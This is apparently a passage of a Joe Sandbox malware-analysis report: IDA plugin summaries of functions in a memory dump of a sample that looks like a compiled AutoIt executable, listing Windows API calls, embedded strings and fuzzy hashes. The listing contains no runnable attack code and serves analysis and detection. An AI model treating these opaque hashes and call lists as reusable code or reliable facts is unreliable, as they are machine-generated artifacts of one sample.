                                                                                • Instruction Fuzzy Hash: A8A1EF31204706AFD735DF64C884BEAB7A8FF44351F008519FD9A92190DB78EE4ACB91
                                                                                APIs
                                                                                • GetClassNameW.USER32(00000008,?,00000400), ref: 0075D8EB
                                                                                • _wcscmp.LIBCMT ref: 0075D8FC
                                                                                • GetWindowTextW.USER32(00000001,?,00000400), ref: 0075D924
                                                                                • CharUpperBuffW.USER32(?,00000000), ref: 0075D941
                                                                                • _wcscmp.LIBCMT ref: 0075D95F
                                                                                • _wcsstr.LIBCMT ref: 0075D970
                                                                                • GetClassNameW.USER32(00000018,?,00000400), ref: 0075D9A8
                                                                                • _wcscmp.LIBCMT ref: 0075D9B8
                                                                                • GetWindowTextW.USER32(00000002,?,00000400), ref: 0075D9DF
                                                                                • GetClassNameW.USER32(00000018,?,00000400), ref: 0075DA28
                                                                                • _wcscmp.LIBCMT ref: 0075DA38
                                                                                • GetClassNameW.USER32(00000010,?,00000400), ref: 0075DA60
                                                                                • GetWindowRect.USER32(00000004,?), ref: 0075DAC9
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000001.00000002.1288510667.0000000000721000.00000020.00000001.01000000.00000003.sdmp, Offset: 00720000, based on PE: true
                                                                                • Associated: 00000001.00000002.1288275823.0000000000720000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000001.00000002.1288572865.00000000007AD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000001.00000002.1288572865.00000000007CE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000001.00000002.1288626390.00000000007DA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000001.00000002.1288656746.00000000007E4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_1_2_720000_VIAmJUhQ54.jbxd
                                                                                Similarity
                                                                                • API ID: ClassName_wcscmp$Window$Text$BuffCharRectUpper_wcsstr
                                                                                • String ID: @$ThumbnailClass
                                                                                • API String ID: 1788623398-1539354611
                                                                                • Opcode ID: f5afcf1283e37d44f1ad38f33df8f385348bfdf8709c12f346459dd473c5e46f
                                                                                • Instruction ID: 43965c447b6d36b729a6a1e83333f6d6d8080a1da4a467d657388821917b33a8
                                                                                • Opcode Fuzzy Hash: f5afcf1283e37d44f1ad38f33df8f385348bfdf8709c12f346459dd473c5e46f
                                                                                • Instruction Fuzzy Hash: 6181E5710083059BDB35DF50C884FEA7BE8EF84315F04846AFD899A096DB78ED49CBA1
                                                                                APIs
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000001.00000002.1288510667.0000000000721000.00000020.00000001.01000000.00000003.sdmp, Offset: 00720000, based on PE: true
                                                                                • Associated: 00000001.00000002.1288275823.0000000000720000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000001.00000002.1288572865.00000000007AD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000001.00000002.1288572865.00000000007CE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000001.00000002.1288626390.00000000007DA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000001.00000002.1288656746.00000000007E4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_1_2_720000_VIAmJUhQ54.jbxd
                                                                                Similarity
                                                                                • API ID: __wcsnicmp
                                                                                • String ID: ACTIVE$ALL$CLASSNAME=$HANDLE=$LAST$REGEXP=$[ACTIVE$[ALL$[CLASS:$[HANDLE:$[LAST$[REGEXPTITLE:
                                                                                • API String ID: 1038674560-1810252412
                                                                                • Opcode ID: c88dd2ae3d39337b24f8112a7872a72466ec3d0ff83bce030ed451a34f79c963
                                                                                • Instruction ID: 7bb18da604c120595b6d95ba4270988d0d3320ea51efd359966261054c5238f2
                                                                                • Opcode Fuzzy Hash: c88dd2ae3d39337b24f8112a7872a72466ec3d0ff83bce030ed451a34f79c963
                                                                                • Instruction Fuzzy Hash: 04318EB1A44205EADB34FA60ED57EED73B59F24711F20002AF841711D2FBADAE0AC665
                                                                                APIs
                                                                                • LoadIconW.USER32(00000063), ref: 0075EAB0
                                                                                • SendMessageW.USER32(?,00000080,00000000,00000000), ref: 0075EAC2
                                                                                • SetWindowTextW.USER32(?,?), ref: 0075EAD9
                                                                                • GetDlgItem.USER32(?,000003EA), ref: 0075EAEE
                                                                                • SetWindowTextW.USER32(00000000,?), ref: 0075EAF4
                                                                                • GetDlgItem.USER32(?,000003E9), ref: 0075EB04
                                                                                • SetWindowTextW.USER32(00000000,?), ref: 0075EB0A
                                                                                • SendDlgItemMessageW.USER32(?,000003E9,000000CC,?,00000000), ref: 0075EB2B
                                                                                • SendDlgItemMessageW.USER32(?,000003E9,000000C5,00000000,00000000), ref: 0075EB45
                                                                                • GetWindowRect.USER32(?,?), ref: 0075EB4E
                                                                                • SetWindowTextW.USER32(?,?), ref: 0075EBB9
                                                                                • GetDesktopWindow.USER32 ref: 0075EBBF
                                                                                • GetWindowRect.USER32(00000000), ref: 0075EBC6
                                                                                • MoveWindow.USER32(?,?,?,?,00000000,00000000), ref: 0075EC12
                                                                                • GetClientRect.USER32(?,?), ref: 0075EC1F
                                                                                • PostMessageW.USER32(?,00000005,00000000,00000000), ref: 0075EC44
                                                                                • SetTimer.USER32(?,0000040A,00000000,00000000), ref: 0075EC6F
                                                                                Memory Dump Source
                                                                                • Source File: 00000001.00000002.1288510667.0000000000721000.00000020.00000001.01000000.00000003.sdmp, Offset: 00720000, based on PE: true
                                                                                • Associated: 00000001.00000002.1288275823.0000000000720000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000001.00000002.1288572865.00000000007AD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000001.00000002.1288572865.00000000007CE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000001.00000002.1288626390.00000000007DA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000001.00000002.1288656746.00000000007E4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_1_2_720000_VIAmJUhQ54.jbxd
                                                                                Similarity
                                                                                • API ID: Window$ItemMessageText$RectSend$ClientDesktopIconLoadMovePostTimer
                                                                                • String ID:
                                                                                • API String ID: 3869813825-0
                                                                                • Opcode ID: 23d67194aa18764959b0b94206eb50f344629a9c798190837c1996412ab2e98f
                                                                                • Instruction ID: a1b3f26e33eafa4a2b714b168b27d9725da47d21e207d81b01cfce880eb0bb69
                                                                                • Opcode Fuzzy Hash: 23d67194aa18764959b0b94206eb50f344629a9c798190837c1996412ab2e98f
                                                                                • Instruction Fuzzy Hash: DA513E71900709EFDB24DFA8CD89FAEBBB5FF44705F008518E556A25A0D7B8A948CB14
                                                                                APIs
                                                                                • LoadCursorW.USER32(00000000,00007F8A), ref: 007779C6
                                                                                • LoadCursorW.USER32(00000000,00007F00), ref: 007779D1
                                                                                • LoadCursorW.USER32(00000000,00007F03), ref: 007779DC
                                                                                • LoadCursorW.USER32(00000000,00007F8B), ref: 007779E7
                                                                                • LoadCursorW.USER32(00000000,00007F01), ref: 007779F2
                                                                                • LoadCursorW.USER32(00000000,00007F81), ref: 007779FD
                                                                                • LoadCursorW.USER32(00000000,00007F88), ref: 00777A08
                                                                                • LoadCursorW.USER32(00000000,00007F80), ref: 00777A13
                                                                                • LoadCursorW.USER32(00000000,00007F86), ref: 00777A1E
                                                                                • LoadCursorW.USER32(00000000,00007F83), ref: 00777A29
                                                                                • LoadCursorW.USER32(00000000,00007F85), ref: 00777A34
                                                                                • LoadCursorW.USER32(00000000,00007F82), ref: 00777A3F
                                                                                • LoadCursorW.USER32(00000000,00007F84), ref: 00777A4A
                                                                                • LoadCursorW.USER32(00000000,00007F04), ref: 00777A55
                                                                                • LoadCursorW.USER32(00000000,00007F02), ref: 00777A60
                                                                                • LoadCursorW.USER32(00000000,00007F89), ref: 00777A6B
                                                                                • GetCursorInfo.USER32(?), ref: 00777A7B
                                                                                Memory Dump Source
                                                                                • Source File: 00000001.00000002.1288510667.0000000000721000.00000020.00000001.01000000.00000003.sdmp, Offset: 00720000, based on PE: true
                                                                                • Associated: 00000001.00000002.1288275823.0000000000720000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000001.00000002.1288572865.00000000007AD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000001.00000002.1288572865.00000000007CE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000001.00000002.1288626390.00000000007DA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000001.00000002.1288656746.00000000007E4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_1_2_720000_VIAmJUhQ54.jbxd
                                                                                Similarity
                                                                                • API ID: Cursor$Load$Info
                                                                                • String ID:
                                                                                • API String ID: 2577412497-0
                                                                                • Opcode ID: 5012fff67af2776f980b6a28f23ffee18e2660eb1e4abbb63f6a38e0477178ca
                                                                                • Instruction ID: 3e6a34ffdefe3df7449833164580d085d7ee9e9cad8df13028fe586b20d91137
                                                                                • Opcode Fuzzy Hash: 5012fff67af2776f980b6a28f23ffee18e2660eb1e4abbb63f6a38e0477178ca
                                                                                • Instruction Fuzzy Hash: 1331F6B1D4831A6ADF109FBA8C8995FBEE8FF04750F508526A50DE7281DA7CA501CFA1
                                                                                APIs
                                                                                  • Part of subcall function 0073E968: GetCurrentDirectoryW.KERNEL32(00007FFF,?,?,?,0072C8B7,?,00002000,?,?,00000000,?,0072419E,?,?,?,007BDC00), ref: 0073E984
                                                                                  • Part of subcall function 0072660F: GetFullPathNameW.KERNEL32(?,00007FFF,?,00000000,?,?,007253B1,?,?,007261FF,?,00000000,00000001,00000000), ref: 0072662F
                                                                                • __wsplitpath.LIBCMT ref: 0072C93E
                                                                                  • Part of subcall function 00741DFC: __wsplitpath_helper.LIBCMT ref: 00741E3C
                                                                                • _wcscpy.LIBCMT ref: 0072C953
                                                                                • _wcscat.LIBCMT ref: 0072C968
                                                                                • SetCurrentDirectoryW.KERNEL32(?,?,?,?,?,?,00000001,?,?,00000000), ref: 0072C978
                                                                                • SetCurrentDirectoryW.KERNEL32(?), ref: 0072CABE
                                                                                  • Part of subcall function 0072B337: _wcscpy.LIBCMT ref: 0072B36F
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000001.00000002.1288510667.0000000000721000.00000020.00000001.01000000.00000003.sdmp, Offset: 00720000, based on PE: true
                                                                                • Associated: 00000001.00000002.1288275823.0000000000720000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000001.00000002.1288572865.00000000007AD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000001.00000002.1288572865.00000000007CE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000001.00000002.1288626390.00000000007DA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000001.00000002.1288656746.00000000007E4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_1_2_720000_VIAmJUhQ54.jbxd
                                                                                Similarity
                                                                                • API ID: CurrentDirectory$_wcscpy$FullNamePath__wsplitpath__wsplitpath_helper_wcscat
                                                                                • String ID: #include depth exceeded. Make sure there are no recursive includes$>>>AUTOIT SCRIPT<<<$AU3!$Bad directive syntax error$EA06$Error opening the file$Unterminated string
                                                                                • API String ID: 2258743419-1018226102
                                                                                • Opcode ID: 4d4763f86e25c100d459c0fc0ae89a4e6e61fb0d22a00b7e44951adaf8157975
                                                                                • Instruction ID: 7883570fed22a13ae9f4332aeef0ffaf9e08fc22644d38e14b655b97558ded09
                                                                                • Opcode Fuzzy Hash: 4d4763f86e25c100d459c0fc0ae89a4e6e61fb0d22a00b7e44951adaf8157975
                                                                                • Instruction Fuzzy Hash: 5D128D71508341DFC725EF24D885AAFBBF5AF99304F00491EF58A93262DB38DA49CB52
                                                                                APIs
                                                                                • _memset.LIBCMT ref: 0078CEFB
                                                                                • DestroyWindow.USER32(?,?), ref: 0078CF73
                                                                                • CreateWindowExW.USER32(00000008,tooltips_class32,00000000,?,80000000,80000000,80000000,80000000,?,00000000,00000000,?), ref: 0078CFF4
                                                                                • SendMessageW.USER32(00000000,00000433,00000000,00000030), ref: 0078D016
                                                                                • SendMessageW.USER32(00000000,00000432,00000000,00000030), ref: 0078D025
                                                                                • DestroyWindow.USER32(?), ref: 0078D042
                                                                                • CreateWindowExW.USER32(00000008,tooltips_class32,00000000,?,80000000,80000000,80000000,80000000,?,00000000,00720000,00000000), ref: 0078D075
                                                                                • SendMessageW.USER32(00000000,00000432,00000000,00000030), ref: 0078D094
                                                                                • GetDesktopWindow.USER32 ref: 0078D0A9
                                                                                • GetWindowRect.USER32(00000000), ref: 0078D0B0
                                                                                • SendMessageW.USER32(00000000,00000418,00000000,?), ref: 0078D0C2
                                                                                • SendMessageW.USER32(00000000,00000421,?,00000000), ref: 0078D0DA
                                                                                  • Part of subcall function 0073B526: GetWindowLongW.USER32(?,000000EB), ref: 0073B537
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000001.00000002.1288510667.0000000000721000.00000020.00000001.01000000.00000003.sdmp, Offset: 00720000, based on PE: true
                                                                                • Associated: 00000001.00000002.1288275823.0000000000720000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000001.00000002.1288572865.00000000007AD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000001.00000002.1288572865.00000000007CE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000001.00000002.1288626390.00000000007DA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000001.00000002.1288656746.00000000007E4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_1_2_720000_VIAmJUhQ54.jbxd
                                                                                Similarity
                                                                                • API ID: Window$MessageSend$CreateDestroy$DesktopLongRect_memset
                                                                                • String ID: 0$tooltips_class32
                                                                                • API String ID: 3877571568-3619404913
                                                                                • Opcode ID: 7068c78f0e3d8f1c749e6d0429e7a900f930e0111f2021b1414b591066c9852a
                                                                                • Instruction ID: 476cb11467c360948750c07fea56370077c6cf5ae94e7fa4e6553062a2f070a7
                                                                                • Opcode Fuzzy Hash: 7068c78f0e3d8f1c749e6d0429e7a900f930e0111f2021b1414b591066c9852a
                                                                                • Instruction Fuzzy Hash: 8671ACB0180345AFE724DF28CC85FA677E5EB89704F44851DF9858B2A1DB78ED42CB26
                                                                                APIs
                                                                                  • Part of subcall function 0073B34E: GetWindowLongW.USER32(?,000000EB), ref: 0073B35F
                                                                                • DragQueryPoint.SHELL32(?,?), ref: 0078F37A
                                                                                  • Part of subcall function 0078D7DE: ClientToScreen.USER32(?,?), ref: 0078D807
                                                                                  • Part of subcall function 0078D7DE: GetWindowRect.USER32(?,?), ref: 0078D87D
                                                                                  • Part of subcall function 0078D7DE: PtInRect.USER32(?,?,0078ED5A), ref: 0078D88D
                                                                                • SendMessageW.USER32(?,000000B0,?,?), ref: 0078F3E3
                                                                                • DragQueryFileW.SHELL32(?,000000FF,00000000,00000000), ref: 0078F3EE
                                                                                • DragQueryFileW.SHELL32(?,00000000,?,00000104), ref: 0078F411
                                                                                • _wcscat.LIBCMT ref: 0078F441
                                                                                • SendMessageW.USER32(?,000000C2,00000001,?), ref: 0078F458
                                                                                • SendMessageW.USER32(?,000000B0,?,?), ref: 0078F471
                                                                                • SendMessageW.USER32(?,000000B1,?,?), ref: 0078F488
                                                                                • SendMessageW.USER32(?,000000B1,?,?), ref: 0078F4AA
                                                                                • DragFinish.SHELL32(?), ref: 0078F4B1
                                                                                • DefDlgProcW.USER32(?,00000233,?,00000000,?,?,?), ref: 0078F59C
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000001.00000002.1288510667.0000000000721000.00000020.00000001.01000000.00000003.sdmp, Offset: 00720000, based on PE: true
                                                                                • Associated: 00000001.00000002.1288275823.0000000000720000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000001.00000002.1288572865.00000000007AD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000001.00000002.1288572865.00000000007CE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000001.00000002.1288626390.00000000007DA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000001.00000002.1288656746.00000000007E4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_1_2_720000_VIAmJUhQ54.jbxd
                                                                                Similarity
                                                                                • API ID: MessageSend$Drag$Query$FileRectWindow$ClientFinishLongPointProcScreen_wcscat
                                                                                • String ID: @GUI_DRAGFILE$@GUI_DRAGID$@GUI_DROPID
                                                                                • API String ID: 169749273-3440237614
                                                                                • Opcode ID: 59b3105a1bb1545bdab658b820831adfcf11ac75dde42b292b690973e278a50b
                                                                                • Instruction ID: 77e4e6d0f3d3424e407b3ea62273458c4bce2758bbf85454207f863f2c5a33ce
                                                                                • Opcode Fuzzy Hash: 59b3105a1bb1545bdab658b820831adfcf11ac75dde42b292b690973e278a50b
                                                                                • Instruction Fuzzy Hash: A2615971108340AFC311EF64DC89E9FBBF8EF99750F404A1EF595921A1DB789A09CB62
                                                                                APIs
                                                                                • VariantInit.OLEAUT32(00000000), ref: 0076AB3D
                                                                                • VariantCopy.OLEAUT32(?,?), ref: 0076AB46
                                                                                • VariantClear.OLEAUT32(?), ref: 0076AB52
                                                                                • VariantTimeToSystemTime.OLEAUT32(?,?,?), ref: 0076AC40
                                                                                • __swprintf.LIBCMT ref: 0076AC70
                                                                                • VarR8FromDec.OLEAUT32(?,?), ref: 0076AC9C
                                                                                • VariantInit.OLEAUT32(?), ref: 0076AD4D
                                                                                • SysFreeString.OLEAUT32(00000016), ref: 0076ADDF
                                                                                • VariantClear.OLEAUT32(?), ref: 0076AE35
                                                                                • VariantClear.OLEAUT32(?), ref: 0076AE44
                                                                                • VariantInit.OLEAUT32(00000000), ref: 0076AE80
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000001.00000002.1288510667.0000000000721000.00000020.00000001.01000000.00000003.sdmp, Offset: 00720000, based on PE: true
                                                                                • Associated: 00000001.00000002.1288275823.0000000000720000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000001.00000002.1288572865.00000000007AD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000001.00000002.1288572865.00000000007CE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000001.00000002.1288626390.00000000007DA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000001.00000002.1288656746.00000000007E4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_1_2_720000_VIAmJUhQ54.jbxd
                                                                                Similarity
                                                                                • API ID: Variant$ClearInit$Time$CopyFreeFromStringSystem__swprintf
                                                                                • String ID: %4d%02d%02d%02d%02d%02d$Default
                                                                                • API String ID: 3730832054-3931177956
                                                                                • Opcode ID: 699e456154b4d6c7027f7d3c30c367220e020527815f6c8d4f15e0e24ef4fa6b
                                                                                • Instruction ID: 8c1633fb4e57aa67fe8ac3c7d4c5694a96466a67dcdecb4447c2e775dde0d062
                                                                                • Opcode Fuzzy Hash: 699e456154b4d6c7027f7d3c30c367220e020527815f6c8d4f15e0e24ef4fa6b
                                                                                • Instruction Fuzzy Hash: 2BD19EB1A04215EBDB209F65D889B6DB7B5FF05700F148465E80ABB181DB7CEC40DFA6
                                                                                APIs
                                                                                • CharUpperBuffW.USER32(?,?), ref: 007871FC
                                                                                • SendMessageW.USER32(?,00001105,00000000,00000000), ref: 00787247
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000001.00000002.1288510667.0000000000721000.00000020.00000001.01000000.00000003.sdmp, Offset: 00720000, based on PE: true
                                                                                • Associated: 00000001.00000002.1288275823.0000000000720000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000001.00000002.1288572865.00000000007AD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000001.00000002.1288572865.00000000007CE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000001.00000002.1288626390.00000000007DA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000001.00000002.1288656746.00000000007E4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_1_2_720000_VIAmJUhQ54.jbxd
                                                                                Similarity
                                                                                • API ID: BuffCharMessageSendUpper
                                                                                • String ID: CHECK$COLLAPSE$EXISTS$EXPAND$GETITEMCOUNT$GETSELECTED$GETTEXT$GETTOTALCOUNT$ISCHECKED$SELECT$UNCHECK
                                                                                • API String ID: 3974292440-4258414348
                                                                                • Opcode ID: 18b41afa85c5d2bfc5ff447d4cfe09c93066976668ac429a955beba5286a852d
                                                                                • Instruction ID: 3337d8506983d166c840025fcdb928d9be46bcf0a5551ed2132a802e70996343
                                                                                • Opcode Fuzzy Hash: 18b41afa85c5d2bfc5ff447d4cfe09c93066976668ac429a955beba5286a852d
                                                                                • Instruction Fuzzy Hash: 98916D70204745DBCB09EF10C855A6EB7A1BF94310F14486DF89A6B7A3DB38ED0ACB91
                                                                                APIs
                                                                                • EnumChildWindows.USER32(?,0075CF50), ref: 0075CE90
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000001.00000002.1288510667.0000000000721000.00000020.00000001.01000000.00000003.sdmp, Offset: 00720000, based on PE: true
                                                                                • Associated: 00000001.00000002.1288275823.0000000000720000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000001.00000002.1288572865.00000000007AD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000001.00000002.1288572865.00000000007CE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000001.00000002.1288626390.00000000007DA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000001.00000002.1288656746.00000000007E4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_1_2_720000_VIAmJUhQ54.jbxd
                                                                                Similarity
                                                                                • API ID: ChildEnumWindows
                                                                                • String ID: 4+}$CLASS$CLASSNN$H+}$INSTANCE$L+}$NAME$P+}$REGEXPCLASS$T+}$TEXT
                                                                                • API String ID: 3555792229-3448502944
                                                                                • Opcode ID: e2be2755dfa2a4059e0ea316adc036cdd738574a85559396711895e3eb9c5ec0
                                                                                • Instruction ID: 4eb175a6944122a65545b0bd023ddf47a2ec45c6884d187c67944e5def47c004
                                                                                • Opcode Fuzzy Hash: e2be2755dfa2a4059e0ea316adc036cdd738574a85559396711895e3eb9c5ec0
                                                                                • Instruction Fuzzy Hash: FE918270600606DEDB19EF60C486BEDFB75BF04301F50852AD849A7191DFB8A95ECBE0
                                                                                APIs
                                                                                • LoadImageW.USER32(00000000,?,00000001,?,?,00002010), ref: 0078E5AB
                                                                                • LoadLibraryExW.KERNEL32(?,00000000,00000032,00000000,?,?,?,?,?,0078BEAF), ref: 0078E607
                                                                                • LoadImageW.USER32(?,?,00000001,?,?,00000000), ref: 0078E647
                                                                                • LoadImageW.USER32(?,?,00000001,?,?,00000000), ref: 0078E68C
                                                                                • LoadImageW.USER32(?,?,00000001,?,?,00000000), ref: 0078E6C3
                                                                                • FreeLibrary.KERNEL32(?,00000004,?,?,?,?,0078BEAF), ref: 0078E6CF
                                                                                • ExtractIconExW.SHELL32(?,00000000,00000000,00000000,00000001), ref: 0078E6DF
                                                                                • DestroyIcon.USER32(?,?,?,?,?,0078BEAF), ref: 0078E6EE
                                                                                • SendMessageW.USER32(?,00000170,00000000,00000000), ref: 0078E70B
                                                                                • SendMessageW.USER32(?,00000064,00000172,00000001), ref: 0078E717
                                                                                  • Part of subcall function 00740FA7: __wcsicmp_l.LIBCMT ref: 00741030
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000001.00000002.1288510667.0000000000721000.00000020.00000001.01000000.00000003.sdmp, Offset: 00720000, based on PE: true
                                                                                • Associated: 00000001.00000002.1288275823.0000000000720000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000001.00000002.1288572865.00000000007AD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000001.00000002.1288572865.00000000007CE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000001.00000002.1288626390.00000000007DA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000001.00000002.1288656746.00000000007E4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_1_2_720000_VIAmJUhQ54.jbxd
                                                                                Similarity
                                                                                • API ID: Load$Image$IconLibraryMessageSend$DestroyExtractFree__wcsicmp_l
                                                                                • String ID: .dll$.exe$.icl
                                                                                • API String ID: 1212759294-1154884017
                                                                                • Opcode ID: a59a4ef2ef8066f6ef33ff67eb5633cbfc9fc6cd57f0118dd7b1a0ce0bd3035c
                                                                                • Instruction ID: 46db5454eda04fcad3a0aaa2f440fe06f0d411b7442e688f9866a746748c72c9
                                                                                • Opcode Fuzzy Hash: a59a4ef2ef8066f6ef33ff67eb5633cbfc9fc6cd57f0118dd7b1a0ce0bd3035c
                                                                                • Instruction Fuzzy Hash: D561CFB1640215FAEB24EF64CC46FFE7BA8BB18724F104115F915E61D1EB789E90CBA0
                                                                                APIs
                                                                                  • Part of subcall function 0072936C: __swprintf.LIBCMT ref: 007293AB
                                                                                  • Part of subcall function 0072936C: __itow.LIBCMT ref: 007293DF
                                                                                • CharLowerBuffW.USER32(?,?), ref: 0076D292
                                                                                • GetDriveTypeW.KERNEL32 ref: 0076D2DF
                                                                                • mciSendStringW.WINMM(?,00000000,00000000,00000000), ref: 0076D327
                                                                                • mciSendStringW.WINMM(?,00000000,00000000,00000000), ref: 0076D35E
                                                                                • mciSendStringW.WINMM(?,00000000,00000000,00000000), ref: 0076D38C
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000001.00000002.1288510667.0000000000721000.00000020.00000001.01000000.00000003.sdmp, Offset: 00720000, based on PE: true
                                                                                • Associated: 00000001.00000002.1288275823.0000000000720000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000001.00000002.1288572865.00000000007AD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000001.00000002.1288572865.00000000007CE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000001.00000002.1288626390.00000000007DA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000001.00000002.1288656746.00000000007E4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_1_2_720000_VIAmJUhQ54.jbxd
                                                                                Similarity
                                                                                • API ID: SendString$BuffCharDriveLowerType__itow__swprintf
                                                                                • String ID: type cdaudio alias cd wait$ wait$close$close cd wait$closed$open$open $set cd door
                                                                                • API String ID: 1148790751-4113822522
                                                                                • Opcode ID: 0837e2f41b87cbd74c0425ad5138d0662066f2d988dafe943b6f9424734b4109
                                                                                • Instruction ID: adaa6e6d93c50bb30f354edf60166bccde25579af5d27dfc6334873074349929
                                                                                • Opcode Fuzzy Hash: 0837e2f41b87cbd74c0425ad5138d0662066f2d988dafe943b6f9424734b4109
                                                                                • Instruction Fuzzy Hash: 7F5149B1604315DFC710EF10D88596EB3F4EF98718F00886DF896672A2DB39AE06CB52
                                                                                APIs
                                                                                • GetModuleHandleW.KERNEL32(00000000,?,00000FFF,00000016,00000000,?,?,00793973,00000016,0000138C,00000016,?,00000016,007BDDB4,00000000,?), ref: 007626F1
                                                                                • LoadStringW.USER32(00000000,?,00793973,00000016), ref: 007626FA
                                                                                • GetModuleHandleW.KERNEL32(00000000,00000016,?,00000FFF,?,?,00793973,00000016,0000138C,00000016,?,00000016,007BDDB4,00000000,?,00000016), ref: 0076271C
                                                                                • LoadStringW.USER32(00000000,?,00793973,00000016), ref: 0076271F
                                                                                • __swprintf.LIBCMT ref: 0076276F
                                                                                • __swprintf.LIBCMT ref: 00762780
                                                                                • _wprintf.LIBCMT ref: 00762829
                                                                                • MessageBoxW.USER32(00000000,?,?,00011010), ref: 00762840
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000001.00000002.1288510667.0000000000721000.00000020.00000001.01000000.00000003.sdmp, Offset: 00720000, based on PE: true
                                                                                • Associated: 00000001.00000002.1288275823.0000000000720000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000001.00000002.1288572865.00000000007AD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000001.00000002.1288572865.00000000007CE000.00000002.00000001.01000000.00000003.sdmpDownload File
